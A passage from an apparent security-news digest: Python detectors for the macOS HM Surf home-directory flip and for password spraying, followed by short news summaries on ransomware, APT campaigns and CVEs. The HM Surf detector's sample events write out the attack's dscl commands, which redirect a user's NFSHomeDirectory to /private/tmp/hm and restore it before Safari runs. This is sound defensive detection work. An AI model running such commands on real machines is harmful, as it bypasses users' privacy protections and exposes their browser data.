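from datetime import datetime, timedelta

FLIP_WINDOW = timedelta(minutes=10)


def dscl_home_rewrite(argv):
    """If argv is a dscl call that rewrites a record's NFSHomeDirectory,
    return (record_path, new_value); otherwise None.  Reads are ignored."""
    if not argv or argv[0].rsplit("/", 1)[-1] != "dscl":
        return None
    for i, arg in enumerate(argv):
        if arg in ("-change", "-create") and len(argv) > i + 3 and argv[i + 2] == "NFSHomeDirectory":
            return argv[i + 1], argv[-1]
    return None


def is_safari(argv):
    return bool(argv) and argv[0].endswith("/Safari.app/Contents/MacOS/Safari")


def detect(events):
    """events: dicts with ts (datetime), user, argv (list of str).
    Returns (kind, user, subject, detail) tuples in event order."""
    alerts = []
    last_rewrite = {}   # (user, record) -> ts of the previous NFSHomeDirectory rewrite
    flipped_at = {}     # user -> ts of the last detected flip
    for e in sorted(events, key=lambda e: e["ts"]):
        user, ts, argv = e["user"], e["ts"], e["argv"]
        hit = dscl_home_rewrite(argv)
        if hit:
            record, new_home = hit
            alerts.append(("nfshome_rewritten", user, record, new_home))
            prev = last_rewrite.get((user, record))
            if prev is not None and ts - prev <= FLIP_WINDOW:
                # rewritten twice in quick succession: change, tamper, restore
                alerts.append(("home_dir_flip", user, record, str(ts - prev)))
                flipped_at[user] = ts
            last_rewrite[(user, record)] = ts
        elif is_safari(argv) and user in flipped_at and ts - flipped_at[user] <= FLIP_WINDOW:
            alerts.append(("safari_after_home_flip", user, argv[0], ""))
    return alerts


def sample_events():
    """Constructed process events (format assumed; not Microsoft's telemetry)."""
    t0 = datetime(2024, 10, 17, 14, 0, 0)

    def ev(offset_s, user, cmd):
        return {"ts": t0 + timedelta(seconds=offset_s), "user": user, "argv": shlex.split(cmd)}

    return [
        ev(0, "alice", "/usr/bin/dscl . -read /Users/alice NFSHomeDirectory"),  # read only: benign
        ev(5, "alice", "/usr/bin/dscl . -change /Users/alice NFSHomeDirectory /Users/alice /private/tmp/hm"),
        ev(90, "alice", "/usr/bin/dscl . -change /Users/alice NFSHomeDirectory /private/tmp/hm /Users/alice"),
        ev(120, "alice", "/Applications/Safari.app/Contents/MacOS/Safari"),
        ev(300, "bob", "/Applications/Safari.app/Contents/MacOS/Safari"),  # no flip for bob: silent
    ]


if __name__ == "__main__":
    for alert in detect(sample_events()):
        print(*alert)
```

        On a fleet, the first rule alone is noisy for admins who legitimately move home folders; the flip rule and the Safari follow-on are what make the sequence specific. Because Microsoft notes the dscl step needs no TCC grant on Sonoma, process telemetry (not TCC's own logs) is the place to catch it, and file writes under the real ~/Library/Safari while NFSHomeDirectory points elsewhere would be a natural third signal if your sensor exposes them.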


        U.S. and Allies Warn of Iranian Cyberattacks on Critical Infrastructure in Year-Long Campaign

        ciber
        2024-10-18 https://thehackernews.com/2024/10/us-and-allies-warn-of-iranian.html
        Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks. "Since October 2023, Iranian actors have used brute force and password spraying to compromise user accounts and obtain access to organizations in the healthcare and "

        Autosummary: The attacks have targeted healthcare, government, information technology, engineering, and energy sectors, per the Australian Federal Police (AFP), the Australian Signals Directorate's Australian Cyber Security Centre (ACSC), the Communications Security Establishment Canada (CSE), the U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA). "
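        The advisory above is about brute force and password spraying against user accounts. The Python detector below is an added example, not tooling from any of the agencies named: it shows why the two need different detection logic. A per-account lockout counter catches brute force (many failures on one account) but is exactly what a spray is shaped to evade (one or two tries per account across many accounts), so the detector keeps a sliding window per source IP and alerts on "many distinct accounts, few tries each" as well as on the classic single-account hammering. The event format and the sample log are constructed; thresholds are assumptions to tune against your own baseline.

```python
"""Separate password spraying from classic brute force in failed-login events.
Added example for the Iranian brute-force / password-spraying advisory;
not agency tooling.  Event format is constructed JSON lines (assumed)."""
import json
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)
SPRAY_MIN_USERS = 10      # distinct accounts failed from one source inside WINDOW
SPRAY_MAX_PER_USER = 3    # sprays stay under per-account lockout thresholds
BRUTE_MIN_ATTEMPTS = 20   # one source hammering one account


def parse(lines):
    for line in lines:
        e = json.loads(line)
        e["ts"] = datetime.fromisoformat(e["ts"])
        yield e


def per_account_lockout(lines, threshold=5):
    """The control a spray is built to slip under: lock any account that
    accumulates `threshold` failures, regardless of source."""
    fails = Counter(e["user"] for e in parse(lines) if e["result"] == "failure")
    return {u for u, n in fails.items() if n >= threshold}


def detect(lines):
    """Source-centric sliding window over failures.  Returns (kind, src_ip, detail)."""
    per_src = defaultdict(deque)   # src_ip -> deque of (ts, user) failures in WINDOW
    alerted, alerts = set(), []
    for e in sorted(parse(lines), key=lambda e: e["ts"]):
        if e["result"] != "failure":
            continue
        src, q = e["src_ip"], per_src[e["src_ip"]]
        q.append((e["ts"], e["user"]))
        while q and e["ts"] - q[0][0] > WINDOW:
            q.popleft()
        per_user = Counter(u for _, u in q)
        if (len(per_user) >= SPRAY_MIN_USERS
                and max(per_user.values()) <= SPRAY_MAX_PER_USER
                and ("spray", src) not in alerted):
            alerted.add(("spray", src))
            alerts.append(("password_spray", src,
                           f"{len(per_user)} accounts, <= {max(per_user.values())} tries each"))
        for user, n in per_user.items():
            if n >= BRUTE_MIN_ATTEMPTS and ("brute", src, user) not in alerted:
                alerted.add(("brute", src, user))
                alerts.append(("brute_force", src, f"{n} failures against {user}"))
    return alerts


def sample_log():
    """Constructed events: one spray, one brute force, one clumsy legitimate user."""
    base = datetime(2024, 10, 15, 9, 0, 0)

    def ev(ts, user, src, result):
        return json.dumps({"ts": ts.isoformat(), "user": user,
                           "src_ip": src, "result": result})

    lines = [ev(base + timedelta(minutes=i), f"user{i:02d}", "203.0.113.7", "failure")
             for i in range(12)]                                   # spray: 12 accounts x 1 try
    lines += [ev(base + timedelta(seconds=10 * i), "admin", "198.51.100.9", "failure")
              for i in range(25)]                                  # brute force: 25 tries on admin
    lines += [ev(base + timedelta(minutes=1), "alice", "192.0.2.5", "failure"),
              ev(base + timedelta(minutes=2), "alice", "192.0.2.5", "failure"),
              ev(base + timedelta(minutes=3), "alice", "192.0.2.5", "success")]
    return lines


if __name__ == "__main__":
    print("per-account lockout would catch:", per_account_lockout(sample_log()))
    for alert in detect(sample_log()):
        print(*alert)
```

        On the constructed log the lockout rule locks only admin and never sees the spray, while the windowed detector raises both. A spray spread across many source addresses will also slip past a per-source window; for that case pivot the same logic to be account-centric (many accounts each failing once from any source inside the window) or key it on a shared user-agent or ASN.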


        Tech giant Nidec confirms data breach following ransomware attack

        financial exploits ransomware
        2024-10-18 https://www.bleepingcomputer.com/news/security/tech-giant-nidec-confirms-data-breach-following-ransomware-attack/
        Nidec Corporation is informing that hackers behind a ransomware attack it suffered earlier this year stole data and leaked it on the dark web. [...] "

        Autosummary: The investigation also revealed that the attackers stole 50,694 files, including the following: Internal documents Letters from business partners Documents related to green procurement Labor safety and health policies (business and supply chain, etc.) "


        Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass

        Linux
        2024-10-18 https://www.bleepingcomputer.com/news/security/intel-amd-cpus-on-linux-impacted-by-newly-disclosed-spectre-bypass/
        The latest generations of Intel processors, including Xeon chips, and AMD's older Zen 1, Zen 1+, and Zen 2 microarchitectures on Linux are vulnerable to new speculative execution attacks that bypass existing "Spectre" mitigations. [...] "

        Autosummary: The vulnerabilities impact Intel's 12th, 13th, and 14th chip generations for consumers and the 5th and 6th generation of Xeon processors for servers, along with AMD's Zen 1, Zen 1+, and Zen 2 processors. "


        How to leverage $200 million FCC program boosting K-12 cybersecurity

        ciber
        2024-10-18 https://www.bleepingcomputer.com/news/security/how-to-leverage-200-million-fcc-program-boosting-k-12-cybersecurity/
        In 2024, the Federal Communications Commission (FCC) launched the K-12 Cybersecurity Pilot Program, a groundbreaking initiative backed by $200 million in funding. Learn more from Cynet about how schools and libraries can apply to this program. [...] "

        Autosummary: Long-Term Impact and Cynet’s Role Beyond Funding As a leading provider of cybersecurity solutions with extensive experience in K-12 education, schools, universities, and libraries, Cynet Security is committed to building a resilient digital infrastructure for the entire education sector. With Cynet, schools strengthen their cybersecurity posture, improve their chances of receiving funding, and ensure they’re equipped to combat an ever-evolving threat landscape. "


        Unauthorized data access vulnerability in macOS is detailed by Microsoft

        exploits
        2024-10-18 https://www.malwarebytes.com/blog/news/2024/10/microsoft-reveals-details-about-hm-surf-vulnerability-in-macos
        Microsoft disclosed details about the HM Surf vulnerability that could allow an attacker to gain access to the user’s data in Safari "

        Autosummary: The vulnerability, tracked as CVE-2024-44133 was fixed in the September 16 update for Mac Studio (2022 and later), iMac (2019 and later), Mac Pro (2019 and later), Mac Mini (2018 and later), MacBook Air (2020 and later), MacBook Pro (2018 and later), and iMac Pro (2017 and later). "


        Threat actors exploiting zero-days faster than ever – Week in security with Tony Anscombe

        exploits
        2024-10-18 https://www.welivesecurity.com/en/videos/threat-actors-exploiting-zero-days-faster-ever-week-security-tony-anscombe/
        The average time it takes attackers to weaponize a vulnerability, either before or after a patch is released, shrank from 63 days in 2018-2019 to just five days last year "

        Autosummary: "


        Venezuela arrests five foreigners over alleged anti-government plot

        government
        2024-10-18 https://www.bbc.com/news/articles/cly24q16ev0o
        Three Americans were arrested, with Venezuela accusing them of working with US spy agencies. "

        Autosummary: Data published by the opposition suggests its candidate, Edmundo González, was the true winner, and international observers said that the election was seriously flawed. "


        How NIS2 will impact sectors from healthcare to energy

        industry
        2024-10-17 https://www.helpnetsecurity.com/2024/10/17/mick-baccio-splunk-nis2-challenges/

        In this Help Net Security interview, Mick Baccio, Global Security Advisor at Splunk SURGe, discusses the far-reaching implications of the NIS2 Directive beyond traditional IT security. He explains how NIS2 will fundamentally change cybersecurity governance, making it a core aspect of organizational strategy and accountability. Many experts suggest that the NIS2 Directive has far-reaching implications beyond IT security. Could you expand on the specific non-technical requirements that companies must be aware of? The NIS2 Directive … More

        The post How NIS2 will impact sectors from healthcare to energy appeared first on Help Net Security.

        "

        Autosummary: The NIS2 Directive significantly broadens its scope compared to NIS1, now encompassing critical sectors such as telecommunications, food production, waste management, energy, healthcare, and chemical manufacturing.Moreover, as not all services benefit from a one-stop shop jurisdiction regime, some entities will face up to 27 distinct registration, auditing, and enforcement regimes. "


        The role of compromised cyber-physical devices in modern cyberattacks

        ciber
        2024-10-17 https://www.helpnetsecurity.com/2024/10/17/fyodor-yarochkin-trend-micro-compromised-cyber-physical-devices/

        Cyber-physical devices are increasingly getting compromised and leveraged by criminal groups and state-sponsored threat actors. Fyodor Yarochkin, Senior Threat Solution Architect with Trend Micro, believes that getting a better understanding of attackers’ infrastructure leads to a better understanding of the attackers themselves. (The answers have been lightly edited for clarity.) In your talk at Deep Conference next week, you will be talking about cyber-physical devices being compromised and used by cyber criminals and state-sponsored threat … More

        The post The role of compromised cyber-physical devices in modern cyberattacks appeared first on Help Net Security.

        "

        Autosummary: We don’t see so much DDoS, but we see a lot of other unwanted actions, such as web scraping, credential spraying, cryptocurrency pump-and-dump campaigns, scraping of online shops, sneaker bot activity, online ticket speculation, carding (to match geolocation to the card owner location), and so on. Recent botnet disruptions by law enforcement have revealed that botnet operators are currently favoring the 3-Tier architecture: compromised (IoT, server, endpoint) devices make Tier 1, Tier 2 are servers forwarding communications between those devices and the servers issuing orders (Tier 3). Devices that interconnect the physical world give attackers a unique perspective: they allow them to perform on-ground observation of events, to monitor and observe the impact of their attacks, and can even sometimes make an impact on the physical world (although this would normally require them to be connected to some sort of SCADA/ICS equipment). "


        Cognizant Neuro Cybersecurity enhances threat detection and response

        ciber
        2024-10-17 https://www.helpnetsecurity.com/2024/10/17/cognizant-neuro-cybersecurity/

        Cognizant announced the debut of Cognizant Neuro Cybersecurity, a new addition to Cognizant’s Neuro suite of platforms, designed to amplify cybersecurity resilience by integrating and orchestrating point cybersecurity solutions across the enterprise. Sophisticated threat actors, hybrid workforces, and the complexity of managing multiple security tools all weigh on an enterprise’s ability to manage cybersecurity risks. Traditional siloed technology and operations often lack the ability to deliver the insights that enable rapid decisions to preserve security … More

        The post Cognizant Neuro Cybersecurity enhances threat detection and response appeared first on Help Net Security.

        "

        Autosummary: “As cybersecurity challenges become increasingly sophisticated and threats more acute, enterprises must adapt continually to remain a step ahead of threat actors,” said Annadurai Elango, EVP and Global Head, Core Technologies and Insights, Cognizant. "


        Critical Kubernetes Image Builder Vulnerability Exposes Nodes to Root Access Risk

        exploits
        2024-10-17 https://thehackernews.com/2024/10/critical-kubernetes-image-builder.html
        A critical security flaw has been disclosed in the Kubernetes Image Builder that, if successfully exploited, could be abused to gain root access under certain circumstances. The vulnerability, tracked as CVE-2024-9486 (CVSS score: 9.8), has been addressed in version 0.1.38. The project maintainers acknowledged Nicolai Rybnikar for discovering and reporting the vulnerability. "A security issue "

        Autosummary: The development comes as Microsoft released server-side patches for three Critical-rated flaws in Dataverse, Imagine Cup, and Power Platform that could lead to privilege escalation and information disclosure: CVE-2024-38139 (CVSS score: 8.7), improper authentication in Microsoft Dataverse that allows an authorized attacker to elevate privileges over a network; CVE-2024-38204 (CVSS score: 7.5), improper access control in Imagine Cup that allows an authorized attacker to elevate privileges over a network; and CVE-2024-38190 (CVSS score: 8.6) - "


        Mexico drug tsar's spectacular fall from grace culminates in NY court

        latam
        2024-10-17 https://www.bbc.com/news/articles/c7v64lnzy02o
        Genaro García Luna is the highest-ranking Mexican official ever to be convicted in the US. "

        Autosummary: García Luna, of course, was found to have been well-remunerated with millions in drug money by the notorious kingpin, Joaquín "El Chapo" Guzmán, for his services. “It’s worth asking whether these big cases have any real preventative effect,” says Deborah Bonello, an investigative journalist and the author of Narcas, which is about women in organised crime. During the arrest earlier this year of one of the co-founders of the Sinaloa Cartel, Ismael "El Mayo" Zambada, the Americans essentially acted alone and didn’t share any intelligence information with their Mexican counterparts ahead of time, points out Ms Bonello. "


        Researchers Uncover Cicada3301 Ransomware Operations and Its Affiliate Program

        exploits ransomware
        2024-10-17 https://thehackernews.com/2024/10/cross-platform-cicada3301-ransomware.html
        Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called Cicada3301 after successfully gaining access to the group's affiliate panel on the dark web. Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an "

        Autosummary: "


        BianLian ransomware claims attack on Boston Children"s Health Physicians

        exploits ransomware
        2024-10-17 https://www.bleepingcomputer.com/news/security/bianlian-ransomware-claims-attack-on-boston-childrens-health-physicians/
        The BianLian ransomware group has claimed the cyberattack on Boston Children's Health Physicians (BCHP) and threatens to leak stolen files unless a ransom is paid. [...] "

        Autosummary: Potentially exposed data types: full names, Social Security numbers, addresses, dates of birth, driver's license numbers, medical record numbers, health insurance information, billing information, and (limited) treatment information. BCHP clarifies that the cyberattack did not impact its electronic medical record systems, as they are hosted on a separate network. "


        A glimmer of good news on the ransomware front, as encryption rates plummet

        exploits ransomware
        2024-10-17 https://www.tripwire.com/state-of-security/glimmer-good-news-ransomware-front-encryption-rates-plummet
        No one would be bold enough to say that the ransomware problem is receding, but a newly-published report by Microsoft does deliver a sliver of encouraging news amongst the gloom. And boy do we need some good news - amid reports that 389 US-based healthcare institutions were hit by ransomware last year - more than one every single day. Read more in my article on the Tripwire State of Security blog. "

        Autosummary: The 114-page Microsoft Digital Defense Report (MDDR) looks at multiple aspects of the cybersecurity landscape, including AI security, denial-of-service attacks, phishing, social engineering, and nation-state threats. "


        Russian RomCom Attacks Target Ukrainian Government with New SingleCamper RAT Variant

        government rusia-ucrania
        2024-10-17 https://thehackernews.com/2024/10/russian-romcom-attacks-target-ukrainian.html
        The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023. The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0), said Cisco Talos, which is monitoring the activity cluster under the moniker UAT-5647. "This "

        Autosummary: "


        Fake Google Meet conference errors push infostealing malware

        exploits
        2024-10-17 https://www.bleepingcomputer.com/news/security/fake-google-meet-conference-errors-push-infostealing-malware/
        A new ClickFix campaign is luring users to fraudulent Google Meet conference pages showing fake connectivity errors that deliver info-stealing malware for Windows and macOS operating systems. [...] "

        Autosummary: "


        Russia-linked RomCom group targeted Ukrainian government agencies since late 2023

        government
        2024-10-17 https://securityaffairs.com/169928/apt/romcom-targeted-ukrainian-government-agencies.html
        Russia-linked threat actor RomCom targeted Ukrainian government agencies and Polish entities in cyber attacks since late 2023. Cisco Talos researchers observed Russia-linked threat actor RomCom (aka UAT-5647, Storm-0978, Tropical Scorpius, UAC-0180, UNC2596) targeting Ukrainian government agencies and Polish entities in a new wave of attacks since at least late 2023.  In the recent attacks, RomCom […] "

        Autosummary: Cisco Talos researchers observed Russia-linked threat actor RomCom (aka UAT-5647, Storm-0978, Tropical Scorpius, UAC-0180, UNC2596) targeting Ukrainian government agencies and Polish entities in a new wave of attacks since at least late 2023. "


        Cybersecurity jobs available right now: October 16, 2024

        ciber
        2024-10-16 https://www.helpnetsecurity.com/2024/10/16/cybersecurity-jobs-available-right-now-october-16-2024/

        Application Security Engineer Cognism | France | Hybrid – View job details As an Application Security Engineer, you will conduct in-depth security assessments of web applications, identifying vulnerabilities using automated tools (e.g., SAST, DAST) and manual techniques. You will analyze source code for security vulnerabilities, focusing on secure coding practices, and provide feedback to developers on mitigating risks. Additionally, you will work with DevOps teams to integrate security testing tools and processes into CI/CD pipelines, … More

        The post Cybersecurity jobs available right now: October 16, 2024 appeared first on Help Net Security.

        "

        Autosummary: Penetration Tester Ekco | Ireland | Hybrid – View job details As a Penetration Tester, you will conduct comprehensive penetration tests on clients’ systems across various platforms (including web applications, thick client applications, infrastructure, APIs, cloud platforms) to identify security vulnerabilities, weaknesses, and potential risks. Lead Detection Engineer UKG | Ireland | Hybrid – View job details As a Lead Detection Engineer, you will be providing hands-on solutions, customization and tuning, automation, dashboards, and use case development for the SIEM, SOAR, and other stakeholder requirements for threat informed defense strategies. Senior Governance Risk and Compliance Specialist Nippon Gases | Italia | Hybrid – View job details As a Senior Governance Risk and Compliance Specialist, you will develop, enhance, operationalize enterprise-level security, risk policies, processes, and controls to mitigate risk and comply with applicable laws and regulations. Cyber Security Engineer DS Smith | United Kingdom | Hybrid – View job details As a Cyber Security Engineer, you will be a member of a global network of security specialists supporting business facing operations, ICS/OT, IT, and the digital security function, with a focus on mitigating and reducing the threat levels within the business related to digital services. "


        CISA Warns of Active Exploitation in SolarWinds Help Desk Software Vulnerability

        exploits
        2024-10-16 https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-in.html
        The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting SolarWinds Web Help Desk (WHD) software to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. Tracked as CVE-2024-28987 (CVSS score: 9.1), the vulnerability relates to a case of hard-coded credentials that could be abused to gain "

        Autosummary: "


        Astaroth Banking Malware Resurfaces in Brazil via Spear-Phishing Attack

        financial exploits latam
        2024-10-16 https://thehackernews.com/2024/10/astaroth-banking-malware-resurfaces-in.html
        A new spear-phishing campaign targeting Brazil has been found delivering a banking malware called Astaroth (aka Guildma) by making use of obfuscated JavaScript to slip past security guardrails. "The spear-phishing campaign's impact has targeted various industries, with manufacturing companies, retail firms, and government agencies being the most affected," Trend Micro said in a new analysis. " "

        Autosummary: "


        Tor Browser and Firefox users should update to fix actively exploited vulnerability

        exploits
        2024-10-16 https://www.malwarebytes.com/blog/news/2024/10/tor-browser-and-firefox-users-should-update-to-fix-actively-exploited-vulnerability
        Mozilla warns that a vulnerability in Firefox and Tor Browser is actively being exploited against both browsers "

        Autosummary: Version number should be 13.5.7 or higher. The vulnerability, tracked as CVE-2024-9680, allows attackers to execute malicious code within the browser’s content process, which is the environment where it loads and renders web content. "


        Defenders must adapt to shrinking exploitation timelines

        exploits
        2024-10-16 https://www.helpnetsecurity.com/2024/10/16/time-to-exploit-vulnerabilities-2023/

        A new report from Mandiant reveals that the average time-to-exploit vulnerabilities before or after a patch is released has plunged to just five days in 2023, down from 32 days in 2021-2022. One reason for this is the fact that, in 2023, exploitation of zero-day vulnerabilities (unknown to vendors, with no patches available) considerably outpaced the exploitation of n-day flaws (publicly disclosed bugs, with patches available). Another is that n-day exploitation continues to … More

        The post Defenders must adapt to shrinking exploitation timelines appeared first on Help Net Security.

        "

        Autosummary: The analysts pointed out that, for example, CVE-2023-28121, an improper authentication vulnerability affecting the WooCommerce Payments plugin for WordPress, was exploited quickly after an exploit was available, while CVE-2023-27997, a heap-based buffer overflow in the SSL/VPN component of Fortinet FortiOS, took much longer despite immediate public attention and exploit releases. "


        From Misuse to Abuse: AI Risks and Attacks

        Linux
        2024-10-16 https://thehackernews.com/2024/10/from-misuse-to-abuse-ai-risks-and.html
        AI from the attacker’s perspective: See how cybercriminals are leveraging AI and exploiting its vulnerabilities to compromise systems, users, and even other AI applications Cybercriminals and AI: The Reality vs. Hype “AI will not replace humans in the near future. But humans who know how to use AI are going to replace those humans who don't know how to use AI,” says Etay Maor, Chief Security "

        Autosummary: There are six key LLM (Large Language Model) components that can be targeted by attackers: Prompt (attacks like prompt injections, where malicious input is used to manipulate the AI's output); Response (misuse or leakage of sensitive information in AI-generated responses); Model (theft, poisoning, or manipulation of the AI model); Training Data (introducing malicious data to alter the behavior of the AI). Using AI to Abuse AI: Introducing GPTs. GPTs, introduced by OpenAI on November 6, 2023, are customizable versions of ChatGPT that allow users to add specific instructions, integrate external APIs and incorporate unique knowledge sources. AI Attacks and Risks: There are multiple frameworks existing today to assist organizations that are considering developing and creating AI-based software: NIST Artificial Intelligence Risk Management Framework; Google's Secure AI Framework; OWASP Top 10 for LLM Applications; the recently launched MITRE ATLAS LLM Attack Surface "


        North Korean ScarCruft Exploits Windows Zero-Day to Spread RokRAT Malware

        exploits
        2024-10-16 https://thehackernews.com/2024/10/north-korean-scarcruft-exploits-windows.html
        The North Korean threat actor known as ScarCruft has been linked to the zero-day exploitation of a now-patched security flaw in Windows to infect devices with malware known as RokRAT. The vulnerability in question is CVE-2024-38178 (CVSS score: 7.5), a memory corruption bug in the Scripting Engine that could result in remote code execution when using the Edge browser in Internet Explorer Mode. "

        Autosummary: The latest version of RokRAT is capable of enumerating files, terminating arbitrary processes, receiving and executing commands received from a remote server, and gathering data from various applications such as KakaoTalk, WeChat, and browsers like Chrome, Edge, Opera, Naver Whale, and Firefox. "


        Malicious ads exploited Internet Explorer zero day to drop malware

        exploits
        2024-10-16 https://www.bleepingcomputer.com/news/security/malicious-ads-exploited-internet-explorer-zero-day-to-drop-malware/
        The North Korean hacking group ScarCruft launched a large-scale attack in May that leveraged an Internet Explorer zero-day flaw to infect targets with the RokRAT malware and exfiltrate data. [...] "

        Autosummary: ScarCruft (aka "APT37" or "RedEyes") is a state-sponsored cyber-espionage threat actor known for targeting systems in South Korea and Europe, as well as North Korean human rights activists and defectors, using phishing, watering hole, and Internet Explorer zero-days. "


        USDoD hacker behind National Public Data breach arrested in Brazil

        financial latam
        2024-10-16 https://www.bleepingcomputer.com/news/security/usdod-hacker-behind-national-public-data-breach-arrested-in-brazil/
        A notorious hacker named USDoD, who is linked to the National Public Data and InfraGard breaches, has been arrested by Brazil's Polícia Federal in "Operation Data Breach". [...] "

        Autosummary: "


        SolarWinds Web Help Desk flaw is now exploited in attacks

        exploits
        2024-10-16 https://www.bleepingcomputer.com/news/security/solarwinds-web-help-desk-flaw-is-now-exploited-in-attacks/
        CISA has added three flaws to its "Known Exploited Vulnerabilities" (KEV) catalog, among which is a critical hardcoded credentials flaw in SolarWinds Web Help Desk (WHD) that the vendor fixed in late August 2024. [...] "

        Autosummary: SolarWinds Web Help Desk is an IT help desk suite used by 300,000 customers worldwide, including government agencies, large corporations, and healthcare organizations.


        Google: 70% of exploited flaws disclosed in 2023 were zero-days

        exploits
        2024-10-16 https://www.bleepingcomputer.com/news/security/google-70-percent-of-exploited-flaws-disclosed-in-2023-were-zero-days/
        Google Mandiant security analysts warn of a worrying new trend of threat actors demonstrating a better capability to discover and exploit zero-day vulnerabilities in software. [...]

        Autosummary: From 2020 until 2022, the ratio between n-days (fixed flaws) and zero-days (no fix available) remained relatively steady at 4:6, but in 2023, the ratio shifted to 3:7.


        Brazil’s Polícia Federal arrested the notorious hacker USDoD

        latam
        2024-10-16 https://securityaffairs.com/169914/cyber-crime/brazils-policia-federal-arrested-hacker-usdod.html
        Brazil’s Polícia Federal has arrested hacker USDoD, the hacker behind the National Public Data and InfraGard breaches. Brazil’s Polícia Federal (PF) announced the arrest in Belo Horizonte/MG of the notorious hacker USDoD. In August, a CrowdStrike investigation revealed that the hacker USDoD (aka EquationCorp), who is known for high-profile data leaks, is a man from Brazil. The […]

        Autosummary: Among them, it was possible to identify tax registration, email addresses, registered domains, IP addresses, social media accounts, telephone number and city.


        U.S. CISA adds Microsoft Windows Kernel, Mozilla Firefox and SolarWinds Web Help Desk bugs to its Known Exploited Vulnerabilities catalog

        exploits Linux
        2024-10-16 https://securityaffairs.com/169882/hacking/u-s-cisa-microsoft-windows-kernel-mozilla-firefox-solarwinds-web-help-desk-bugs-known-exploited-vulnerabilities-catalog.html
        U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Windows Kernel, Mozilla Firefox and SolarWinds Web Help Desk bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: An attacker could exploit the vulnerability CVE-2024-30088 to gain SYSTEM privileges. Successful exploitation of […]

        Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-30088 (CVSS score 7.0), Microsoft Windows Kernel TOCTOU Race Condition Vulnerability; CVE-2024-9680, Mozilla Firefox Use-After-Free Vulnerability; CVE-2024-28987 (CVSS score 9.1)


        GitHub addressed a critical vulnerability in Enterprise Server

        exploits
        2024-10-16 https://securityaffairs.com/169873/security/github-addressed-ctitical-flaw-in-enterprise-server.html
        GitHub addressed a critical vulnerability in Enterprise Server that could allow unauthorized access to affected instances. Code hosting platform GitHub addressed a critical vulnerability, tracked as CVE-2024-9487 (CVSS score of 9.5), in GitHub Enterprise Server that could lead to unauthorized access to affected instances. An attacker could exploit a cryptographic signature verification flaw in GitHub Enterprise Server […]

        Autosummary: An attacker could bypass SAML single sign-on (SSO) authentication with the optional encrypted assertions feature, allowing unauthorized provisioning of users and access to the instance, by exploiting an improper verification of cryptographic signatures vulnerability in GitHub Enterprise Server.


        Colombian man took own life after "multiple failings" at UK detention centre

        latam
        2024-10-16 https://www.bbc.com/news/articles/cn8yn7n745yo
        The coroner examining the death of Frank Ospina said he had been let down by the state "in numerous ways".

        Autosummary: An inquest jury has found "multiple failings" and "missed opportunities" at an immigration detention centre contributed to a Colombian man taking his own life in 2023. Frank Ospina, 39, an engineering graduate, came to the UK in late 2022 to visit his mother, who had settled here, and to visit prospective universities.


        Messi hits hat-trick as Argentina beat Bolivia 6-0

        latam
        2024-10-16 https://www.bbc.com/sport/football/articles/c62re2n8qq7o
        Lionel Messi scores his 10th international hat-trick and sets up two goals as Argentina maintain a three-point lead at the top of World Cup qualifying.



        How does WhatsApp make money? It’s free - with some tricks

        financial
        2024-10-16 https://www.bbc.com/news/articles/c8j7nrppny2o
        We all use messaging apps such as WhatsApp for free, but what’s in it for them?

        Autosummary: Discord, a messaging app largely used by young gamers, has a freemium model – it is free to sign up, but additional features, including access to games, come with a price tag. “Our vision, if we get all of this right, is a business and a customer should be able to get things done right in a chat thread,” says Nikila Srinivasan, vice president of business messaging at Meta.


        Protecting children from grooming | Unlocked 403 cybersecurity podcast (ep. 7)

        ciber
        2024-10-16 https://www.welivesecurity.com/en/videos/protecting-children-grooming-unlocked-403-cybersecurity-podcast-ep-7/
        “Hey, wanna chat?” This innocent phrase can take on a sinister meaning when it comes from an adult to a child online and even be the start of a predatory relationship.



        How nation-states exploit political instability to launch cyber operations

        exploits government
        2024-10-15 https://www.helpnetsecurity.com/2024/10/15/ismael-valenzuela-blackberry-political-instability-cyber-operations/

        In this Help Net Security interview, Ismael Valenzuela, Vice President of Threat Research & Intelligence at BlackBerry, discusses the impact of geopolitical tensions on the frequency and sophistication of cyberattacks. He explains how nation-states and politically motivated groups exploit unrest for strategic advantages, providing examples of recent conflicts and their cyber implications. How do geopolitical tensions directly affect the frequency and sophistication of cyberattacks? Can you give examples of how nation-states or politically motivated groups … More


        Autosummary: This would include data surrounding the identification of cyber-criminal activity and tactics, techniques, and procedures (TTPs) which could act as an early warning system for those threat actors targeting supply chains, the monitoring of deep-web forums for intel related to vulnerabilities that affect the supply chain, initial access brokers (IABs) that are offering access to entities within a supply chain, analysis of geopolitical risks, and the flagging of vulnerabilities within 3rd party or open source software, which is frequently a component of intricate supply chain networks. While the sophistication of these attacks doesn’t always increase, attackers frequently focus on high-value or strategically significant targets, such as governments, diplomatic entities, critical infrastructure, defense sectors, or other key areas. Adopting a defense in depth approach ensures multiple layers of security, while a zero-trust model mandates strict verification for every entity, user, app, service or device accessing resources, limiting the impact of potential mistakes. These threats can arise from various sources, including human error, vulnerabilities in the technology stack, misconfigured devices, insider threats, and other factors that may vary depending on the organization’s specific background or industry. This category includes unintentional mistakes made by employees, such as falling victim to phishing attacks, business email compromise (BEC), misconfiguring devices, and careless handling of sensitive data—such as misplacing documents.


        Data breaches trigger increase in cyber insurance claims

        financial
        2024-10-15 https://www.helpnetsecurity.com/2024/10/15/cyber-claims-frequency/

